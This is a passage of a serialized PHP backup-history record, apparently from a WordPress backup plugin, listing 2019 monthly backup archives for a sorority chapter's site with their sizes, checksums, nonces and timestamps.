gz\";s:7:\"db-size\";i:2658551;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"da616e46e21c10a99138eeaa5cd1ab7c752a80bc\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"1edd1acc8d5dd79915fcc3913835087017b3c46b\";s:8:\"uploads1\";s:40:\"5d532bdcba3e8eaeda3b1e8a82c03190ef673a05\";s:7:\"others0\";s:40:\"49e84312b38c5158b3ceb71951056f7b8f5c724c\";s:3:\"db0\";s:40:\"e8808440ad5b47a1b2a4a8d0d06e49d7ab3c6b64\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"6c93116495cf4f982992e7e07c1481c1e20077bca04efa5ebf9dce67a57d40b2\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"4e472478a11532bbea2b3464d5fef730b5ff45fc8cce2dec9d703a26825cceb7\";s:8:\"uploads1\";s:64:\"9564acb93bf3108eb176db06e96b7534643cb045a92438434d8f044c8b56dd4b\";s:7:\"others0\";s:64:\"03c382aeae7d21992474e0d5d611535f761673c3694be2f1bc2ba67579aafec1\";s:3:\"db0\";s:64:\"cfa88529c6df1a1ed0c7f3e93e9e2b15f6eeb53dd5940dba10de67279f51765f\";}}s:5:\"nonce\";s:12:\"fa5b5ff63f88\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1574401828;s:6:\"themes\";i:1574401839;s:7:\"uploads\";i:1574401839;s:6:\"others\";i:1574401861;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1571723426;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-plugins.zip\";}s:12:\"plugins-size\";i:49530392;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-uploads.zip\";i:1;s:79:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-uploads2.zip\";}s:12:\"uploads-size\";i:382096529;s:13:\"uploads1-size\";i:152339790;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-others.zip\";}s:11:\"others-size\";i:130777352;s:2:\"db\";s:72:\"backup_2019-10-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_4585384e159d-db.gz\";s:7:\"db-size\";i:2650723;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"4349ca9cf7d78021f7c2cbd6709db804bbb4b9c7\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"cc22a79a96c70da2a1adea204734f89add30c00f\";s:8:\"uploads1\";s:40:\"560c2a792d7a97c053641c1abf004311e7b9591d\";s:7:\"others0\";s:40:\"49e84312b38c5158b3ceb71951056f7b8f5c724c\";s:3:\"db0\";s:40:\"da702a1dd22548ec6d005faf729ec481a76309f5\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"f096bd87213d76b2eba48cb57838e61f31689f92f534115f1410454430626e4a\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"027b8cc3c39cd836315dd89edb9a6ab467051531e0737d4f0a11217bb44ef1a5\";s:8:\"uploads1\";s:64:\"3353842c1265816b0a0751fdba4735a6b87d40148717a809d2856b916d49071d\";s:7:\"others0\";s:64:\"03c382aeae7d21992474e0d5d611535f761673c3694be2f1bc2ba67579aafec1\";s:3:\"db0\";s:64:\"9e85d7f4e501f9fdff3661237b9a4ce3ef7df9ecf093e22f82e1f328bf2c4923\";}}s:5:\"nonce\";s:12:\"4585384e159d\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1571723426;s:6:\"themes\";i:1571723436;s:7:\"uploads\";i:1571723437;s:6:\"others\";i:1571723457;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1569134936;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-plugins.zip\";}s:12:\"plugins-size\";i:49420804;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-uploads.zip\";i:1;s:79:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-uploads2.zip\";}s:12:\"uploads-size\";i:382096369;s:13:\"uploads1-size\";i:152339790;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-others.zip\";}s:11:\"others-size\";i:130777352;s:2:\"db\";s:72:\"backup_2019-09-22-0148_Zeta_Phi_Beta_Sorority_Inc_Lam_520ee00b1ab2-db.gz\";s:7:\"db-size\";i:2740518;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"f63ab9ad5104d2e62695b054195afba6c4f59318\";s:7:\"themes0\";s:40:\"5a8cc4b8041a537316e105506bd42d1253596b73\";s:8:\"uploads0\";s:40:\"5d2ed04b25fc0cc551ddf4e05512cc3e0f7ec4f2\";s:8:\"uploads1\";s:40:\"dc0243006c16da1ad1b130b2f0f5b4607c857eba\";s:7:\"others0\";s:40:\"49e84312b38c5158b3ceb71951056f7b8f5c724c\";s:3:\"db0\";s:40:\"4fb969e491c44b79d0e00efa0847d1dbac217e0c\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"c9194e28b98b798c2c68e13ac93a43d8ac2ff19bfa0f8b20f112f3bab14bd7ae\";s:7:\"themes0\";s:64:\"c18c4af46700516acc2ef62e925c81100b0ffb355cec41eb7ecfc616480a5ef8\";s:8:\"uploads0\";s:64:\"27c057f1ab5a3e9b6698517297eb69c19de9976ecaac8f83e84e8f097f2fafd5\";s:8:\"uploads1\";s:64:\"7cd92710014c950218ced662d2bf3ac0e677ad5cb0183440a0576a99a5129828\";s:7:\"others0\";s:64:\"03c382aeae7d21992474e0d5d611535f761673c3694be2f1bc2ba67579aafec1\";s:3:\"db0\";s:64:\"48ea10f462ab3570f5b5dbc3040367796aaa28008a7e21090c85ea03f2a50126\";}}s:5:\"nonce\";s:12:\"520ee00b1ab2\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1569134937;s:6:\"themes\";i:1569134946;s:7:\"uploads\";i:1569134947;s:6:\"others\";i:1569134966;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1566454130;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-plugins.zip\";}s:12:\"plugins-size\";i:48631694;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-uploads.zip\";i:1;s:79:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-uploads2.zip\";}s:12:\"uploads-size\";i:417664575;s:13:\"uploads1-size\";i:116771424;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-08-22-0108_Zeta_Phi_Beta_Sorority_Inc_Lam_218806f67cc0-db.gz\";s:7:\"db-size\";i:2721118;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"45ee241e9c47936e22893cf713b58f5a8985315d\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"37f0a0e0965cdff1be497f48c2a08753bfa51779\";s:8:\"uploads1\";s:40:\"52495adf6a7a8544f786029a53659b22510465eb\";s:7:\"others0\";s:40:\"2f850a3e3418aab328c5a6b94d3d307a7d6af94b\";s:3:\"db0\";s:40:\"9b7badcdc09522f29369f9904f6cff56248e1a46\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"543274d2c3619a5b4720a339c258e9c75f8a5611004a362516a459b09dccb5f0\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"100ad89210eca27bb0eec5d61d643947c997da57b4aaa9e28c9e06088e5b9ad5\";s:8:\"uploads1\";s:64:\"b0e05832e3558d1e26a5b8bab87e740d506edd1afd3bfff1717a8926faf316a6\";s:7:\"others0\";s:64:\"d2ba1aa43079ff8d1392f67d53eb41119d71b67666407411912f970f8b9fe55b\";s:3:\"db0\";s:64:\"61ef51324f425c1435e2f922f06b1467ed145898111a1b1b767bc8bf9c795136\";}}s:5:\"nonce\";s:12:\"218806f67cc0\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1566454131;s:6:\"themes\";i:1566454162;s:7:\"uploads\";i:1566454163;s:6:\"others\";i:1566454238;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1563774672;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-plugins.zip\";}s:12:\"plugins-size\";i:48631694;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-uploads.zip\";i:1;s:79:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-uploads2.zip\";}s:12:\"uploads-size\";i:415579779;s:13:\"uploads1-size\";i:118856060;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-07-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_4bab9ed25282-db.gz\";s:7:\"db-size\";i:2791886;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"8c4802705a790c6f3b100108e3664321d202a29b\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"d8cca1f8262747fbc0c4b4b1baec934cedf2852d\";s:8:\"uploads1\";s:40:\"c64ae8f2911c96cd927abde9a5716664d8bb651a\";s:7:\"others0\";s:40:\"3fc2be10d6caedfcbaacfa74035e12820cc168e3\";s:3:\"db0\";s:40:\"795fb5a07982e5f11f2a32e0456bca856c163032\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"e625ba10eb338eccfa94dbc87eb4913bc1eb8d1e73541be69b523e3432317672\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"55100d025a5d42bad9b51f84d715f1e26f68651b926b31a5f8fb64a8c490d229\";s:8:\"uploads1\";s:64:\"ca195eccd4e1df1ea7ca258535494f8619ad31d397193060f74f15d2d9036aaf\";s:7:\"others0\";s:64:\"cdc5bc5de79232fd4e5bd6b62c08a1c69f6da190a355b8352a2b792ed58a6161\";s:3:\"db0\";s:64:\"66b55a8b2899a1904e9796a43f84d47984fce9470aee7f7b8e2e3324d2a5acfb\";}}s:5:\"nonce\";s:12:\"4bab9ed25282\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1563774673;s:6:\"themes\";i:1563774706;s:7:\"uploads\";i:1563774709;s:6:\"others\";i:1563774792;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1561182672;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-plugins.zip\";}s:12:\"plugins-size\";i:48631694;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-uploads.zip\";i:1;s:79:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-uploads2.zip\";}s:12:\"uploads-size\";i:418797228;s:13:\"uploads1-size\";i:115638451;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-06-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_69fa7a1edb65-db.gz\";s:7:\"db-size\";i:2765134;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"2f1e0aad559d3685dbd23f353051ef7b59f34618\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"546d472f7216bc8e96a6f66381e73701517b66be\";s:8:\"uploads1\";s:40:\"eecd2a2e492be2f64a9c26c2834de221afcb960f\";s:7:\"others0\";s:40:\"2f850a3e3418aab328c5a6b94d3d307a7d6af94b\";s:3:\"db0\";s:40:\"6aae9c001bccccb201b85d8a532db3a05f85b568\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"7d4b1f411202586837033da1a5d160b4f6f749ac619e040e42aade72f1d120e9\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"20e2536dd2db1ab8b832378a152ae10a7df8d076148e848142ede973258fa68f\";s:8:\"uploads1\";s:64:\"fe5406bec4657700e8c0310a408d77735e14e3842d9aa138368da699124ff73c\";s:7:\"others0\";s:64:\"d2ba1aa43079ff8d1392f67d53eb41119d71b67666407411912f970f8b9fe55b\";s:3:\"db0\";s:64:\"957a662eab33f04a314ea30d2be34f322ea37304a526df5661171573d9b1798d\";}}s:5:\"nonce\";s:12:\"69fa7a1edb65\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1561182672;s:6:\"themes\";i:1561182700;s:7:\"uploads\";i:1561182701;s:6:\"others\";i:1561182773;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1558506025;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-plugins.zip\";}s:12:\"plugins-size\";i:48443507;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-uploads.zip\";i:1;s:79:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-uploads2.zip\";}s:12:\"uploads-size\";i:418859961;s:13:\"uploads1-size\";i:115575558;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-05-22-0120_Zeta_Phi_Beta_Sorority_Inc_Lam_9845bd174fde-db.gz\";s:7:\"db-size\";i:2828058;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"8e998a1ef1126d0b9db1a4296f342e1483975d15\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"3d545dc3def86c178e83657426f765ba186f3220\";s:8:\"uploads1\";s:40:\"9e1eaed8202c104e3f68f299b8f8262c1699f515\";s:7:\"others0\";s:40:\"862196ebb348808fa82f1d5726988c685fe6242c\";s:3:\"db0\";s:40:\"24d7994bead6f29e15a0fabcda6c83ff114d6ee0\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"506152f76be977d42b95222fde360386139dfb302b2678a6f0ff0e24ae1e3d55\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"4f02aeaac9bbc6f4c31b6f17f4f02251aa546d0ec9271abdfd1b52fc03146300\";s:8:\"uploads1\";s:64:\"2da59f64c8a8a24c5b72679de9eae5137b1a59a876098cd3a5800ecb91491ef7\";s:7:\"others0\";s:64:\"049a3396243acdca212b4008045cc3ded6bb2011cd93fc856d67ab29e5a5889d\";s:3:\"db0\";s:64:\"94e7855cc2ecdc3cfa0c8e8f7c15b6d2a9189025c9c9d52017f8f809ca8c6d5d\";}}s:5:\"nonce\";s:12:\"9845bd174fde\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1558506026;s:6:\"themes\";i:1558506054;s:7:\"uploads\";i:1558506055;s:6:\"others\";i:1558506123;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1555912308;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-plugins.zip\";}s:12:\"plugins-size\";i:50186728;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-uploads.zip\";i:1;s:79:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-uploads2.zip\";}s:12:\"uploads-size\";i:417618668;s:13:\"uploads1-size\";i:116816174;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-04-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_3e57bd884dff-db.gz\";s:7:\"db-size\";i:2767582;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"3edd16224a1576c34b0e19f262532843fcd29745\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"456431de0d2cf3fbcfe74d830b627a3e75b30e08\";s:8:\"uploads1\";s:40:\"1ce6a830c9db99382796ff029d456811f4e0bae1\";s:7:\"others0\";s:40:\"585942ba4a8a85e19a80b848e4fa4b691cb08c52\";s:3:\"db0\";s:40:\"a91bc10cca9527c44f82e4cc50b7b9172ac333cd\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"79593680a8ab607147e7870f3ad8bb9e6493dbaf67ab4852a71f9a16fee3ba48\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"81205fc85aca6f9a0e988808db37e430425ab1d91ffec8dd0da0cd4bec05548e\";s:8:\"uploads1\";s:64:\"96e5cef3b18ab3111febeaab2e84534033dd844d84d5b046ea2eb3aaf2f05414\";s:7:\"others0\";s:64:\"895840f6491337295d07d19f3217e146accb07db702d56fef2685951f9ef4d55\";s:3:\"db0\";s:64:\"59303d205347059cc9bc6a7c3059b60294418cd9a4d71ebd19660684fa50fb33\";}}s:5:\"nonce\";s:12:\"3e57bd884dff\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1555912309;s:6:\"themes\";i:1555912345;s:7:\"uploads\";i:1555912346;s:6:\"others\";i:1555912410;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1553233881;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-plugins.zip\";}s:12:\"plugins-size\";i:50115360;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-uploads.zip\";i:1;s:79:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-uploads2.zip\";}s:12:\"uploads-size\";i:412271286;s:13:\"uploads1-size\";i:63838942;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-03-22-0051_Zeta_Phi_Beta_Sorority_Inc_Lam_f7725003f32b-db.gz\";s:7:\"db-size\";i:2712328;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"4451fe529faefe23f2dc8ddea227d04d8cd20b38\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"fcfd51319eff683d28e9eb726e48f27d7e3c3723\";s:8:\"uploads1\";s:40:\"e81c6e1b287b8b7abb5c9f8d623f36cf24268ba5\";s:7:\"others0\";s:40:\"585942ba4a8a85e19a80b848e4fa4b691cb08c52\";s:3:\"db0\";s:40:\"51a0feae64542fbac7b67da868bc0abd97f8d783\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"3a0580b8360975cc9d47fe9b320af3f0313cb1f000e59a7bebeec11295a6dd25\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"0e954cf51320272c6a061324e2be4b29631bdb59c07a911694b656d4c49404f9\";s:8:\"uploads1\";s:64:\"0fbeb3853b852d81965217b3c3e41b588e89c9ee574f052bc9692a06b688d43d\";s:7:\"others0\";s:64:\"895840f6491337295d07d19f3217e146accb07db702d56fef2685951f9ef4d55\";s:3:\"db0\";s:64:\"0ed17d05dfc2791f9972a32c9b85fe098fef64706a8af2d3f3dbe95ac0890c65\";}}s:5:\"nonce\";s:12:\"f7725003f32b\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1553233881;s:6:\"themes\";i:1553233911;s:7:\"uploads\";i:1553233913;s:6:\"others\";i:1553233978;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1550814643;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-plugins.zip\";}s:12:\"plugins-size\";i:50051278;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-uploads.zip\";i:1;s:79:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-uploads2.zip\";}s:12:\"uploads-size\";i:418609966;s:13:\"uploads1-size\";i:51360764;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-02-22-0050_Zeta_Phi_Beta_Sorority_Inc_Lam_634f750cc6d1-db.gz\";s:7:\"db-size\";i:2942750;s:9:\"checksums\";a:2:{s:4:\"sha1\";a:6:{s:8:\"plugins0\";s:40:\"2d327c636759580f6f3d9e8f105050460261eeb7\";s:7:\"themes0\";s:40:\"1a18617a7f3b4b8f69e537ae1d070a0b3e7bfc09\";s:8:\"uploads0\";s:40:\"d78b279a7bb2bb9e8a9936b304848d5077403973\";s:8:\"uploads1\";s:40:\"c105f056a578119bb214e4c2692192706a47e128\";s:7:\"others0\";s:40:\"c52252ff0fb068f005e52f0f45d365d12fbfcfe9\";s:3:\"db0\";s:40:\"41b8c9b05335bbe8adbfbf165b52dec26ef6c4d7\";}s:6:\"sha256\";a:6:{s:8:\"plugins0\";s:64:\"2b8971f6ea36d5dcc2d056c3575fe674708fcef4d0616f3b19f959c570d42b2e\";s:7:\"themes0\";s:64:\"2f204c7a990c1a3bcf20b452c269f35a74b488cfff6949ebd669028a0ed212ef\";s:8:\"uploads0\";s:64:\"2e74b4c525300e6c588ec3441faa371dad92a69f0496b5bc47109d8b93c99aa7\";s:8:\"uploads1\";s:64:\"8dabe10af4ac0db5660f1d88361d012219bdec835476f4238c686b73f2dc04aa\";s:7:\"others0\";s:64:\"75f79dfe22f295d769cdfa085a79991e63100cb0caaea1359d9ccdd32fc7e0cc\";s:3:\"db0\";s:64:\"4f31498d71199fefe32e2a71a01c7a1b941136432377f1df97b2223f56f63dd6\";}}s:5:\"nonce\";s:12:\"634f750cc6d1\";s:7:\"service\";a:1:{i:0;s:5:\"email\";}s:20:\"service_instance_ids\";a:0:{}s:11:\"always_keep\";b:0;s:19:\"files_enumerated_at\";a:4:{s:7:\"plugins\";i:1550814644;s:6:\"themes\";i:1550814679;s:7:\"uploads\";i:1550814681;s:6:\"others\";i:1550814753;}s:18:\"created_by_version\";s:7:\"1.14.13\";s:12:\"is_multisite\";b:0;}i:1548136694;a:19:{s:7:\"plugins\";a:1:{i:0;s:78:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-plugins.zip\";}s:12:\"plugins-size\";i:49788767;s:6:\"themes\";a:1:{i:0;s:77:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-themes.zip\";}s:11:\"themes-size\";i:5392662;s:7:\"uploads\";a:2:{i:0;s:78:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-uploads.zip\";i:1;s:79:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-uploads2.zip\";}s:12:\"uploads-size\";i:416333656;s:13:\"uploads1-size\";i:51041342;s:6:\"others\";a:1:{i:0;s:77:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-others.zip\";}s:11:\"others-size\";i:130776972;s:2:\"db\";s:72:\"backup_2019-01-22-0058_Zeta_Phi_Beta_Sorority_Inc_Lam_c37c898058f5-db.gz\";s:7:\"db-size\";i:2672572;s:9:\"